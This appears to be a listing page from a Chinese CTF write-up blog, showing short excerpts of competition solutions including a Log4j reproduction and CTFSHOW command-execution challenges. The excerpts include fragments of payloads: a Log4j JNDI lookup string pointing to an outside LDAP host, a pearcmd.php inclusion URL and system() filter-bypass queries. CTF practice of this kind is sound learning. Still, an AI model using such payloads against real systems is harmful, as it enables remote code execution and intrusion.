H3h3QAQの博客
【XCTF】第四期个人能力认证考核个人wp 【XCTF】第四期个人能力认证考核个人wp
Grey修改图片长度,然后用Stegsolve,在Alpha3通道可以看到两段flag 然后在010末尾可以看到m3_1F 连起来,flag:*CTF{Catch_m3_1F_y0u_cAn} oh-my-grafanaCVE-202
2022-04-16
长安“战疫”网络安全卫士守护赛 部分wp 长安“战疫”网络安全卫士守护赛 部分wp
八卦迷宫折磨!!!! cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang} RCE_No_ParaPHP无参数RCE 参考自:https
2022-01-08
2021SCTF-Loginme 2021SCTF-Loginme
最近也是刚刚放假,比较忙,就看了看这个SCTF 比赛快到尾声的时候才抽出空来看看题 按照惯例,肯定是要看看分最少的题 这道题被我看中了,我打算研究一下这个题 附件是一份源码,而且是go语言的源码 我们来看一看 题中源码给了middlewa
2021-12-28
CTFSHOWLog4j复现 CTFSHOWLog4j复现
今天上午刚刚看完这个洞,自己复现了一下,晚上就看到了上题正好打一下玩玩 多明显的输入框,嘿嘿嘿 这不得来一个 ${jndi:ldap://dnslog.com/exp} (bushi 0x01 准备工作首先准备好恶意Java类 pub
2021-12-10
2021湖湘杯web部分wp 2021湖湘杯web部分wp
easywill本人sb,写好的wp被窝删掉了QAQ 很简单的一道题包含pearcmd.php(审计一下源码就能看到) 好像竞争上传也可以(没试) payload还记得 /index.php?+config-create+/&&am
2021-11-14
CTFSHOW命令执行 CTFSHOW命令执行
CTFSHOW命令执行web29过滤了flag payload: 随便写几个姿势 /?c=system("nl fl??????"); /?c=system("nl fl*"); /?c=system("nl fla''g.php"); /
2021-11-11
1 / 2